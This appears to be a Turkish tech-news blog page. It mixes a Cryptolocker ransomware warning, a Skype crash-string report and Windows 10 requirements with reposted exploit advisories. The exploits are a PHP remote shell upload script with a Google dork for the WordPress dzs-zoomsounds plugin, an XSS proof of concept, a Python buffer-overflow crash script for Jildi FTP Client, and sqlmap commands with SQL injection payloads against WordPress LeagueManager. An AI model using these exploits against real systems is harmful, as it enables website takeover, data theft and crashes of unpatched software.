-
3 Haziran 2015 Çarşamba
Cryptolocker Virüsü Nedir ? Nasıl Temizlenir



Cryptolocker sisteminize bulaşıp tüm dosyalarınızı şifreleyip, bu şifreyi çözmek için ise sizden Fidye isteyen oldukca güçlü bir Virüsdür.
Türkiye dahil dünyanın baş belası olan bu bilgisayar virüsü cihazlara bulaştığı anda dosyaları şifreliyor ve kullanıcılar şifreleri çözdürebilmek için 800 ila 1000 TL arası değişen bedelleri virüsü geliştiren dolandırıcılara ödemek durumunda kalıyor. Bilgi Teknolojileri ve İletişim Kurumu (BTK) da Türkiye’de hızla yayılan bu virüsle ilgili vatandaşa uyarıda bulundu. Daha çok e-posta yoluyla söz konusu virüsün bulaştığına dikkat çeken BTK, güvenilir olmayan hiçbir e-postanın açılmaması gerektiğini vurguladı.
Hürriyet’in 6 Mart’taki CryptoLocker üzerine yaptığı haberin ardından BTK’dan vatandaşlara önemli bir uyarı geldi.
BTK, “Cryptolocker” isimli zararlı yazılım konusunda vatandaşlara, “Bu tuzağa düşmemek için gelen e-postalar dikkatli biçimde incelenmeli. İsim benzerlikleri, harf farklılıkları gibi küçük nüanslara dikkat edilmeli ve içeriğinden emin olunmayan dosyalar çalıştırılmamalı” uyarısında bulundu.
BTK Başkanı Tayfun Acarer, Hürriyet Dünyası’na yaptığı açıklamada kendilerine bu virüs üzerine yüzlerce şikayetin geldiğini ve virüsün yarattığı mağduriyetin küçümsenemeyecek boyutlarda olduğunu belirtti. Kullanıcıların virüsün bulaşmasını beklememesin gerektiğine dikkat çeken Acarer, önemli görülen dosyaların önceden yedeğinin alınması gerektiğine vurgu yaptı.
BTK’dan yapılan açıklamada, son günlerde kamuoyunda sıkça gündeme gelen Cryptolocker isimli zararlı yazılımın maddi ve manevi zarara yol açtığı belirtildi.
Söz konusu zararlı yazılımın bilgisayara bulaştığında bilgisayarın işletim sistemine yerleşerek kullanıcının sisteminde aktif olduğu ve en sık kullanılan dosyaları şifrelediği bildirilen açıklamada, şu ifadelere yer verildi:
“Kullanıcı, şifrelenen dosyaları açamamakta ve dolayısıyla da kullanamamaktadır. Zararlı yazılım aracılığıyla kullanıcının ekranına bir mesaj çıkartılarak, dosyaların şifrelendiği, şifrelenen dosyaların tekrar elde edilmesi için fidye yazılımını yazan kişilerin belirlediği ve yönlendirdiği yere belirli miktarlarda ücret ödenmesi talep edilmektedir.
Söz konusu zararlı yazılımın yayılması çeşitli içeriklerde ‘oltalama saldırıları’ şeklinde gerçekleşmektedir. Örneğin saldırganlar hedef alınan kullanıcıya özel olarak düzenlenmiş ve bilinen telekomünikasyon-teknoloji şirketleri tarafından gönderildiği izlenimi veren sahte fatura e-postaları göndermektedir. Vatandaş da kendisine gelen faturayı görüntülemek için e-postadaki bağlantıları takip etmektedir.

Cryptolocker virüsünün bir ekran görüntüsü
Son günlerde karşılaşılan diğer bir yöntem ise PTT posta hizmetlerinin adını kullanarak ‘Kargonuz teslim edilememiştir’ başlığıyla e-posta atmak şeklindedir. Bu yöntemde kullanıcıdan adres bilgilerini güncelleyip kargolarını alabilmeleri için ‘PTT Adres Değişikliği Formu’nu doldurmaları istenmekte ve teslim edilmeyen gün başına ücret ödenmesi gerektiği belirtilmektedir.”

Kritik dosyalar belirli aralıklarla yedeklenmeli
Benzeri e-postaların, bankacılık, finans ve turizm gibi farklı sektörlerdeki şirketlerin isimleri de kullanılarak gönderilmesi ihtimali bulunduğu, bu tuzağa düşmemek için gelen e-postaların dikkatli biçimde incelenmesi gerektiği kaydedilen açıklamada, “İsim benzerlikleri, harf farklılıkları gibi küçük nüanslara dikkat edilmeli ve içeriğinden emin olunmayan dosyalar çalıştırılmamalıdır. Kritik dosyaların belirli aralıklarla yedeği alınarak korunmalıdır.
Vatandaşlarımız böyle bir saldırı ile karşılaştığında Ulusal Siber Olaylara Müdahale Merkezi’ni ve ilgili işletmecileri bilgilendirerek gerekli tedbirlerin alınmasına yardımcı olabilirler” ifadelerine yer verildi.
DEVAMINI OKU..
Dikkat! Skype'a Gelen Bir Mesaj Tüm Programın Çökmesine Neden Oluyor



iPhone’un bir haftadır boğuştuğu sorun şimdi de Skype’ın başına geldi.  Skype’a gelen ve özel bir dizin içeren mesaj tüm uygulamanın çökmesine sebep oluyor. 
Dikkat, iPhone'lara Gelen Esrarengiz Bir Mesaj Tüm Cihazı Kilitliyor haberimizi hatırlarsınız. Bu haberin üzerinden henüz bir hafta geçmedi. iPhone’da yaşanan bu sıkıntı şimdi de Skype’ı rahatsızediyor.
"http://:" dizinini içeren bir mesaj (tırnaklar olmadan) tüm uygulamanın çökmesine sebep oluyor. Bu sıradan, küçük ve zararsız gibi görünen karakter dizinini size Skype’tan gönderen olursa bilin ki, çok samimi bir amaç gütmüyor olabilir.
Bu sıkıntı sadece PC üzerinde Skype’ı rahatsız ediyor ve uygulamanın çökmesine sebep oluyor. Bazı durumlarda uygulamayı PC’ye yeniden kurmak zorunda bile kalabiliyorsunuz. "http://:" içeren mesaj Skype’a Mac, Android ve iOS üzerinde bir zarar vermiyor ancak PC üzerinde son derece huzur kaçıran tecrübeler yaşanmasına sebep olabiliyor.
DEVAMINI OKU..
Windows 10 Sistem Gereksinimleri Resmi Olarak Açıklandı



Hatırlayacağınız üzere Microsoft geçtiğimiz senenin sonbahar aylarında yeni işletim sistemi Windows 10'u dünyaya tanıtmıştı. Yapılan bu resmi duyurunun hemen ardından Windows 10 önizleme sürümü olan Windows 10 Teknik Önizleme kullanıcıların beğenisine sunulmuştu ve bu sayede herkesin yeni işletim sistemini bireysel olarak denemesine imkan sağlanmıştı. Aradan geçen ayların ardından Windows 10 Teknik Önizlemeye birçok yeni özellik kazandırıldı ve Microsoft'un yeni işletim sistemi ilk haliyle karşılaştırıldığında oldukça geliştirildi. Microsoft'un çok yakın bir zamanda Windows 10'un final sürümünü yayınlayacak ve Windows 7 ve Windows 8.1 kullanıcılarına yeni işletim sistemine ücretsiz geçiş hakkı sağlayacak olması nedeniyle akıllara ilk gelen soru bilgisayarlarımızın Windows 10'u çalıştırıp çalıştıramayacağı. Microsoft resmiWindows 10 sistem gereksinimlerini açıklayarak bu soru işaretlerini gideriyor. İşte Windows 10 final sürümünü çalıştırmak için bilgisayarımızın sahip olması gereken özellikler:
  • 1 GHZ işlemci veya SoC (Mobil cihazlarda kullanılan bütünleşik işlemciler)
  • 32 Bit Windows 10 için 1 GB, 64 Bit Windows 10 için 2 GB RAM
  • 32 Bit Windows 10 için 16 GB boş depolama alanı, 64 Bit Windows 10 için 20 GB boş depolama alanı
  • DirectX 9 destekli ve WDDM 1.0 sürücülerine sahip ekran kartı
  • 1024x600 ekran çözünürlüğü
Bu sistem gereksinimlerine bakıldığında Windows 7 ve Windows 8.1 sistem gereksinimlerine oldukça yakın oldukları görünüyor. Eğer eski işletim sisteminizden Windows 10'a geçecekseniz performasns kaybı yaşamayacağınız ve sorunsuzca yeni işletim sistemine geçebileceğiniz söylenebilir.
DEVAMINI OKU..
WordPress dzs-zoomsounds Remote Shell Upload


###################################################################################################
# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
<?php
$evil="dz.phtml";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>
Shell Access :
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil

# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !


DEVAMINI OKU..
Enhanced SQL Portal 5.0.7961 Cross Site Scripting




[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt



Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php



Product:
============
Enhanced SQL Portal 5.0.7961 web based MySQL administration application.



Advisory Information:
================================================
Enhanced SQL Portal 5.0.7961 XSS Vulnerability



Vulnerability Details:
=====================
iframe.php contains an XSS vulnerability



Exploit code(s):
===============


http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id=
"/><script>alert(666)</script>



Disclosure Timeline:
=========================================================


Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure


Severity Level:
=========================================================
Med



Description:
==========================================================

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] Enhanced SQL Portal 5.0.7961

Vulnerable Parameter(s):
                                [+] id

Affected Area(s):
                                [+] iframe

===============================================================

(hyp3rlinx)
DEVAMINI OKU..
Jildi FTP Client 1.5.2 Build 1138 Buffer Overflow



#!/usr/bin/python
#Exploit Title:Jildi FTP Client Buffer Overflow Poc
#Version:1.5.2 Build 1138
#Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
#Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
#Tested on:Win7 32bit EN-Ultimate
#Date found:     02.06.2015
#Date published: 02.06.2015
#Author:metacom

'''
===========
Description:
===========
JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
and with lots of useful features. It supports multi-thread file upload or
download , so you can upload or download several files at the same time.
The job manager integrates with the Windows scheduler engine ,this provide
you more freedom and flexibility to upload or download your files.
It can also traces changes within a local directory and apply these
changes to remote ftp server .The user-friendly interface lets your
software distribution, uploading files to a web-server, and providing
archives for various purposes more easily.

============
How to Crash:
============
Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
and paste it in the Option -- Name or Address --and press connect.

===============================================
Crash Analysis using WinDBG: Option --> Address
===============================================
(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141

============================================
Crash Analysis using WinDBG: Option --> Name
============================================
(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141
'''
filename="Jildi_FTP.txt"
junk1="\x41" * 20000
buffer=junk1
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
DEVAMINI OKU..
WordPress LeagueManager 3.9.11 SQL Injection 




###################################################################################################
# Exploit Title: WordPress LeagueManager SQLi
# Version: 3.9.11
# Vendor: https://wordpress.org/plugins/leaguemanager
# Software Link: 
https://downloads.wordpress.org/plugin/leaguemanager.3.9.1.1.zip
# Author: javabudd
# Date: 06/01/2015
# Tested on: Linux | Windows
###################################################################################################

Vulnerabilities (2)
==========================

(1) Unauthenticated SQLi [CWE-89]

CODE:
lib/core.php (785)
++++++++++++++++++++++++++
function getMatch() is passed an unsanitized $match_id parameter to the 
SQL query
++++++++++++++++++++++++++

POC:
http://localhost/?match=1

SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://localhost/?match=1" --level 5 --risk 3 
--dbms mysql
++++++++++++++++++++++++++
---
Parameter: match (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: match=1 AND 3991=3991

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP 
BY clause
Payload: match=1 AND (SELECT 8344 FROM(SELECT 
COUNT(*),CONCAT(0x7178717671,(SELECT 
(ELT(8344=8344,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: match=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCcI)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: match=-9496 UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x4945496f7a7062675158,0x717a707a71),NULL--
---
[02:18:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.20, Apache 2.4.10
back-end DBMS: MySQL 5.0

(2) Unauthenticated SQLi [CWE-89]

Code:
lib/core.php (486)
++++++++++++++++++++++++++
function getLeague() is passed an unsanitized $league_id parameter from 
the constructor
++++++++++++++++++++++++++

POC:
http://localhost?season=1&league_id=1&match_day=1&team_id=1

SQLMAP
++++++++++++++++++++++++++
python sqlmap.py --url 
"http://localhost?season=1&league_id=1&match_day=1&team_id=1" --dbms 
mysql --level 5 --risk 3 -p league_id
++++++++++++++++++++++++++
---
Parameter: league_id (GET)
     Type: error-based
     Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or 
GROUP BY clause (EXTRACTVALUE)
     Payload: season=1&league_id=1' AND 
EXTRACTVALUE(4330,CONCAT(0x5c,0x7178717671,(SELECT 
(ELT(4330=4330,1))),0x717a707a71)) AND 'SOeQ'='SOeQ&match_day=1&team_id=1

     Type: AND/OR time-based blind
     Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
     Payload: season=1&league_id=1' AND 
9638=BENCHMARK(5000000,MD5(0x54624c4e)) AND 
'GmZI'='GmZI&match_day=1&team_id=1
---
[03:31:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.20, Apache 2.4.10
back-end DBMS: MySQL 5.1
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )